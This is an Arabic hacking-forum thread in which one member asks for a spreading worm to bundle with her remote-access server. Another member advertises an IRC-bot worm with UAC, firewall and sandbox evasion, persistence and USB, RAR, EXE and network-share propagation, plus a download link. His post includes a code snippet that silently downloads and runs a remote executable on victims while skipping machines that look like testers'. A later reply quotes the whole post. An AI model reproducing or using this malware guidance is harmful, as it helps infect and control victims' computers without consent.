مطلوب دوده الانتشار x4x

**NaDa80** · 06-07-2013, 07:10 PM

بسم الله الرحمن الرحيم
والله انا دورت في كثير من المنتديات عن دوده الانتشار و ماشاء الله جميعها ملغمه ياريت يا اخواني حد يقلي كيف اعمل دوده الانتشار x4x او يبعتلي الدوده عشان ادمجها مع السيرفير بتاعي

للمبتدئين :- وظيفه دوده الانتشار الدودة نوع من انواع الفايروسات تنتشر بصوره كبيره جدا

فيمكن ان تنتشر في الجهاز فولدر فولدر و ملف ملف و ايضا ممكن تنشرها بالشبكات

و الماسنجر و الياهو و الmirc و facebook و و و و و يعني لو جبت ضحيه واحده ممكن تجيب بعدها 100 في ساعه زمين

بس اتمني منكم تساعدونــــــــــــــــــ ـــــــــــــي

**الفاشل العام** · 06-07-2013, 08:54 PM

اختي فيكي تجربي برنامج الاخ ناصر njWorm ينتج سيرفر مدمج
بالتوفيق

**NaDa80** · 06-07-2013, 09:45 PM

هذا البرنامج ينتج الدوده المطلوبه ؟

**brader** · 06-08-2013, 12:48 AM

1- النكهة الاولى (الباتش ينزرع بالنظام على انه خدمه ويملك كافة الصلاحيات في التخطي والسرح والمرح بداخل الجهاز + خواص انتشار)
2- النكهة الثانية (الباتش ينزل باكدور عادي بالجهاز + خواص انتشار + اتاك)
3- النكهة الثالثة (الباتش ينزل باكدور عادي بالجهاز + خواص انتشار بدون اتاك)

-------> المميزات بشكل عام <--------
1- تشتغل على جميع الانظمة بما فيهم Win Vista - Win 7
2- زرع ستارت اب سليم دون اخطاء وتثبت قوي بالضحايا
3- رزبونس سريع عند تلقي الاوامر ولا يوجد تعليق في اجهزة الضحايا وثبات في اتصال الضحايا .
4- تخطي الفايرولات
(بالنسبة لتخطى الويندوز دفندر في فيزتا و 7 هذا يكون بعد التشفير)
5- تخطي User Account Control ---> UAC في انطمة Win Vista & Win 7
6- تخطي الفحص واستخراج البيانات في Threat Expert
7- تخطي الفحص Virtual Machine - SandBoxie - SunBelt
8- انتشار في اغلب برامج المشاركة المشهورة
9- انتشار في حقن جميع الملفات المضغوطة رار
10- انتشار في حقن ملفات exe (جديد)
11- انتشار في نسخ الباتش الى مجلدات المشاركة في الشبكات الداخلية (جديد)
12- انتشار تلغيم USB فلاشات الضحايا (( وطبعن الفلاشة الملغومة مع الدبل كلك تفتح + تشغل الباتش دون اي شبهة ))
13- تمييز الضحية الجديدة بعلامة {N} ,,, (لكي ترى نسبة انتشارك)

-------> الفروقات عن النسخة السابقة <--------
1- انتشار حقن ملفات الرار لا يتم بشكل عشوائي بل يتم على حسب الاستخدام ,, ( اي عندما يقول بتحميل ملف او يقوم برفع ملف او يقوم بنسخ ملف من قرص الى قرص الباتش يحقن نفسه داخله ,, اما الملفات الاخرى اللي الضحية ما يقرب عليها لا يحقن )

2- انتشار تلغيم الفلاشات اضفت له اكواد جديدة وقمت بتشفيرها من السورس عشان ما تنتشر وتنكشف
تقوم بالتالي :
أ- اول مايتم شبك الفلاشة الملغومة بالجهاز تقوم بتشغيل الباتش تلقائيا دون الدخول على الفلاشة حتى
في الاصدار القديم لم تكن كذلك
---------------------
ب- عند الضغط على الفلاشة الملغومة رايت كلك ----> اكسبلورر = يتم تشغيل الباتش ويقوم بفتح النافذة بشكل طبيعي جدا دون او شبهات
في الاصدار القديم زر الرايت كلك اكسبلورر لم يكن ملغما وكان الكثير يتخطى تلغيمة الفلاش عن طريقه لكن نوت اني مور
---------------------
ج- يقوم الباتش عند تشغيله بانشاء ملف اسمه (3asfh_chache.tmp) في مجلد التمبر %TEMP% ثم يقوم بالتحليل التالي
اذا لم يكن الملف موجود مسبقا = 1 (اظهار علامة {N} بجانب نك الضحية لانه جديد)
اذا كان الملف موجود مسبقا = 0 (ضحية قديمة ولا تظهر علامه بجانب النك)
---------------------
د- دمج خوارزمية تناظرية لتشفير البيانات المهمة مثل النوايبي وقناة الدخول وباسوورد القناة و..و.. من نفس السورس (والفرق بين العادية والتناظرية ان هناك مفتاح تشفير يتم خلط البيانات المدخلة والربط بينها على اساسه ولا يمكن فك تشفير هذه البيانات الا من نفس مفتاح التشفير)
راح زمن السنف في الشنلات بس الاحتياط واجب لول
---------------------
ه- هناك مدخلات في بوتات الايرسي مثل MAIN - NICK - PING - USER هذي لابد من وجودها في اي بوت ايرسي
بناءا عليه توجد بعض نسخ البوتات تقوم بعمل سكان على جهاز الضحية وتبحث بالعمليات وان وجدت احدى هذه المدخلات في احدى العمليات (باتش اخر غريب) تقوم بقتله ومسحه ولذلك تم تشفير جميع هذه البيانات لكي تصبح النسخه غير قابلة للقتل ANTI KILL
----------------------
و- الباتش في النكهة الاولى (الخدمه) لا يمكن اغلاقه من التاسك وكل ما تقوم باغلاقه يرجع الى العمل مرة اخرى
----------------------
بعض الاعضاء يسألني ليش ما خليت التلت نكهات كلها الباتش يشتغل على انه خدمه اساسية للنظام ,, ؟؟
الجواب : كان من الافضل والاسهل لكن هناك صعوبات في التشفير ويحدث خلل في عمل البوت ,, لذا عملت نسخ اخرى سهلة التشفير باي برنامج ممكن تشفيرها ,, ولكن يجب بعد التشفير ان تجرب العمل والخصائص وكل شي للتأكد .
----------------------
بالنسبه لحقن ملفات zip قمت بحذفه بسبب انه صار زحمة خواص وثقل كبير في عمل البوت فوجدت ان حقن الرار يغني عنه,
----------------------
لمن طلب مني اضافه خاصية منع الحمايات من التحديث فهي اعتبرها مدمرة للجهاز ومخربة ومزعج جدا لما تجي تدخل عالنوفايروس ومو راضي يدخل (مجرب الشعور)
وغير هذا وذاك ,, روابط الحمايات اللي يتم تحميل الابديت منها قديمة جدا في الاكواد المعروفة ,, والحمايات تخطت هذه الاكواد ببساطه بتغيير هوست الابديت واذكر اني مرة جربت مع الافيرا وحدث غصب عني لول ,, لذا ان قام احد ابطال العاصفة بجمع روابط التحديث الجديدة للحمايات سأقوم باضافتها بسرعه صاروخ
(واذا بدك عدد ضحايا هائل لا تروح تفصل الحمايات عن التحديث عشان ماتخسرهم بل عليك بالتشفير ثم التشفير ثم التشفير)
----------------------

قبل ما نروح على التحميل ,, اريد ان اتكلم عن شخص لا ادري ما اسمه حتى ضافني بالامس على الاميل وبدون سلامات قال انه خبير c++ وعرض علي تلغيم النسخه الجديدة وقال بالحرف (نلغم امر تعريف الدخول على البوتات) و يقصد
.login
عند كتابته انت تعرف على البوتات + يشتغل لودر بلجهاز
وانا على طول اهديته بلوك لان الانسان عندما يخسر ميثاقه يخسر رجولته اولا وثانيا مشغول جدا ومافي وقت للدردشة الغير مفيدة ,, لكن انا متفق معاه على ان تلغيم النسخ هي افضل طريقة لجمع ضحايا بشكل خرافي (في منتديات اجنبية ممكن) ,,
ولكن قبل التلغيم يجب ان تعلم ان هناك مجربين beta testers يقوم باختبار البوت على نفسهم قبل زرعه بالضحايا ,,
وبناءا عليه يا اخي اللذي لم اسألك عن اسمك طريقتك غير مجدية ,, وعشان تسامحني عالبلوك رح اعطيك طريقة افضل ...

-------------------------------------------------------------------------
تضيف كود صغير للتشك (Check FileExist)
تخليه يبحث ان كان برنامج الc++ مثبت عالجهاز ام لا ,, ثم
1 = ان كان مثبت = الغاء العملية
return;0
2= ان كان غير مثبت = اكمل العملية
URLDownloadToFile(http://server.exe,c:\\server.exe);
f****************lExecute("open", "c:\\server.exe, NULL, SW_SHOWHIDDEN);

ومعناه ان كان السي بلس مثبت لا تشغل دونلودر (لانه بيكون واحد بيجرب البوت)
وان كان السي بلس غير مثبت شغل الدوانلودر (لانه بيكون ضحية مسكين)

وبكذا تتخطا المجربين ,, وتشارك بالضحايا
-------------------------------------------------------------------------

اسف على الاطالة ,, نأتي الان لروابط التحميل

لتحميل الشرح وطريقة تشفير البيانات وادخالها على السورس
اللهم صلي على الحبيب
(الحجم 1 ميقا )

لتحميل النسخه الجديدة بالنكهات الثلاثه
اللهم صلي على الحبيب
http://www.mediafire.com/?qd3b4whmweeptyd

**NaDa80** · 06-08-2013, 06:50 AM

مشكوووووووووووووووووووووو وور طول عمرك مبدع لكن طلب صغير اذا سمحت يا اخي ممكن تبعتلي شرح طريقيت التشفير و التعامل مع الدوده ؟

- - - تم التحديث - - -

اسفه شكرا شكرا عملت كومنت قبل ما اقراء الكلام كلووو

**xpmhmd** · 06-09-2013, 07:14 PM

المشاركة الأصلية كتبت بواسطة brader

1- النكهة الاولى (الباتش ينزرع بالنظام على انه خدمه ويملك كافة الصلاحيات في التخطي والسرح والمرح بداخل الجهاز + خواص انتشار)
2- النكهة الثانية (الباتش ينزل باكدور عادي بالجهاز + خواص انتشار + اتاك)
3- النكهة الثالثة (الباتش ينزل باكدور عادي بالجهاز + خواص انتشار بدون اتاك)

-------> المميزات بشكل عام <--------
1- تشتغل على جميع الانظمة بما فيهم Win Vista - Win 7
2- زرع ستارت اب سليم دون اخطاء وتثبت قوي بالضحايا
3- رزبونس سريع عند تلقي الاوامر ولا يوجد تعليق في اجهزة الضحايا وثبات في اتصال الضحايا .
4- تخطي الفايرولات
(بالنسبة لتخطى الويندوز دفندر في فيزتا و 7 هذا يكون بعد التشفير)
5- تخطي User Account Control ---> UAC في انطمة Win Vista & Win 7
6- تخطي الفحص واستخراج البيانات في Threat Expert
7- تخطي الفحص Virtual Machine - SandBoxie - SunBelt
8- انتشار في اغلب برامج المشاركة المشهورة
9- انتشار في حقن جميع الملفات المضغوطة رار
10- انتشار في حقن ملفات exe (جديد)
11- انتشار في نسخ الباتش الى مجلدات المشاركة في الشبكات الداخلية (جديد)
12- انتشار تلغيم USB فلاشات الضحايا (( وطبعن الفلاشة الملغومة مع الدبل كلك تفتح + تشغل الباتش دون اي شبهة ))
13- تمييز الضحية الجديدة بعلامة {N} ,,, (لكي ترى نسبة انتشارك)

-------> الفروقات عن النسخة السابقة <--------
1- انتشار حقن ملفات الرار لا يتم بشكل عشوائي بل يتم على حسب الاستخدام ,, ( اي عندما يقول بتحميل ملف او يقوم برفع ملف او يقوم بنسخ ملف من قرص الى قرص الباتش يحقن نفسه داخله ,, اما الملفات الاخرى اللي الضحية ما يقرب عليها لا يحقن )

2- انتشار تلغيم الفلاشات اضفت له اكواد جديدة وقمت بتشفيرها من السورس عشان ما تنتشر وتنكشف
تقوم بالتالي :
أ- اول مايتم شبك الفلاشة الملغومة بالجهاز تقوم بتشغيل الباتش تلقائيا دون الدخول على الفلاشة حتى
في الاصدار القديم لم تكن كذلك
---------------------
ب- عند الضغط على الفلاشة الملغومة رايت كلك ----> اكسبلورر = يتم تشغيل الباتش ويقوم بفتح النافذة بشكل طبيعي جدا دون او شبهات
في الاصدار القديم زر الرايت كلك اكسبلورر لم يكن ملغما وكان الكثير يتخطى تلغيمة الفلاش عن طريقه لكن نوت اني مور
---------------------
ج- يقوم الباتش عند تشغيله بانشاء ملف اسمه (3asfh_chache.tmp) في مجلد التمبر %TEMP% ثم يقوم بالتحليل التالي
اذا لم يكن الملف موجود مسبقا = 1 (اظهار علامة {N} بجانب نك الضحية لانه جديد)
اذا كان الملف موجود مسبقا = 0 (ضحية قديمة ولا تظهر علامه بجانب النك)
---------------------
د- دمج خوارزمية تناظرية لتشفير البيانات المهمة مثل النوايبي وقناة الدخول وباسوورد القناة و..و.. من نفس السورس (والفرق بين العادية والتناظرية ان هناك مفتاح تشفير يتم خلط البيانات المدخلة والربط بينها على اساسه ولا يمكن فك تشفير هذه البيانات الا من نفس مفتاح التشفير)
راح زمن السنف في الشنلات بس الاحتياط واجب لول
---------------------
ه- هناك مدخلات في بوتات الايرسي مثل MAIN - NICK - PING - USER هذي لابد من وجودها في اي بوت ايرسي
بناءا عليه توجد بعض نسخ البوتات تقوم بعمل سكان على جهاز الضحية وتبحث بالعمليات وان وجدت احدى هذه المدخلات في احدى العمليات (باتش اخر غريب) تقوم بقتله ومسحه ولذلك تم تشفير جميع هذه البيانات لكي تصبح النسخه غير قابلة للقتل ANTI KILL
----------------------
و- الباتش في النكهة الاولى (الخدمه) لا يمكن اغلاقه من التاسك وكل ما تقوم باغلاقه يرجع الى العمل مرة اخرى
----------------------
بعض الاعضاء يسألني ليش ما خليت التلت نكهات كلها الباتش يشتغل على انه خدمه اساسية للنظام ,, ؟؟
الجواب : كان من الافضل والاسهل لكن هناك صعوبات في التشفير ويحدث خلل في عمل البوت ,, لذا عملت نسخ اخرى سهلة التشفير باي برنامج ممكن تشفيرها ,, ولكن يجب بعد التشفير ان تجرب العمل والخصائص وكل شي للتأكد .
----------------------
بالنسبه لحقن ملفات zip قمت بحذفه بسبب انه صار زحمة خواص وثقل كبير في عمل البوت فوجدت ان حقن الرار يغني عنه,
----------------------
لمن طلب مني اضافه خاصية منع الحمايات من التحديث فهي اعتبرها مدمرة للجهاز ومخربة ومزعج جدا لما تجي تدخل عالنوفايروس ومو راضي يدخل (مجرب الشعور)
وغير هذا وذاك ,, روابط الحمايات اللي يتم تحميل الابديت منها قديمة جدا في الاكواد المعروفة ,, والحمايات تخطت هذه الاكواد ببساطه بتغيير هوست الابديت واذكر اني مرة جربت مع الافيرا وحدث غصب عني لول ,, لذا ان قام احد ابطال العاصفة بجمع روابط التحديث الجديدة للحمايات سأقوم باضافتها بسرعه صاروخ
(واذا بدك عدد ضحايا هائل لا تروح تفصل الحمايات عن التحديث عشان ماتخسرهم بل عليك بالتشفير ثم التشفير ثم التشفير)
----------------------

قبل ما نروح على التحميل ,, اريد ان اتكلم عن شخص لا ادري ما اسمه حتى ضافني بالامس على الاميل وبدون سلامات قال انه خبير c++ وعرض علي تلغيم النسخه الجديدة وقال بالحرف (نلغم امر تعريف الدخول على البوتات) و يقصد
.login
عند كتابته انت تعرف على البوتات + يشتغل لودر بلجهاز
وانا على طول اهديته بلوك لان الانسان عندما يخسر ميثاقه يخسر رجولته اولا وثانيا مشغول جدا ومافي وقت للدردشة الغير مفيدة ,, لكن انا متفق معاه على ان تلغيم النسخ هي افضل طريقة لجمع ضحايا بشكل خرافي (في منتديات اجنبية ممكن) ,,
ولكن قبل التلغيم يجب ان تعلم ان هناك مجربين beta testers يقوم باختبار البوت على نفسهم قبل زرعه بالضحايا ,,
وبناءا عليه يا اخي اللذي لم اسألك عن اسمك طريقتك غير مجدية ,, وعشان تسامحني عالبلوك رح اعطيك طريقة افضل ...

-------------------------------------------------------------------------
تضيف كود صغير للتشك (Check FileExist)
تخليه يبحث ان كان برنامج الc++ مثبت عالجهاز ام لا ,, ثم
1 = ان كان مثبت = الغاء العملية
return;0
2= ان كان غير مثبت = اكمل العملية
URLDownloadToFile(http://server.exe,c:\\server.exe);
f****************lExecute("open", "c:\\server.exe, NULL, SW_SHOWHIDDEN);

ومعناه ان كان السي بلس مثبت لا تشغل دونلودر (لانه بيكون واحد بيجرب البوت)
وان كان السي بلس غير مثبت شغل الدوانلودر (لانه بيكون ضحية مسكين)

وبكذا تتخطا المجربين ,, وتشارك بالضحايا
-------------------------------------------------------------------------

اسف على الاطالة ,, نأتي الان لروابط التحميل

لتحميل الشرح وطريقة تشفير البيانات وادخالها على السورس
اللهم صلي على الحبيب
(الحجم 1 ميقا )

لتحميل النسخه الجديدة بالنكهات الثلاثه
اللهم صلي على الحبيب
http://www.mediafire.com/?qd3b4whmweeptyd

مشكوووووووووووور اخي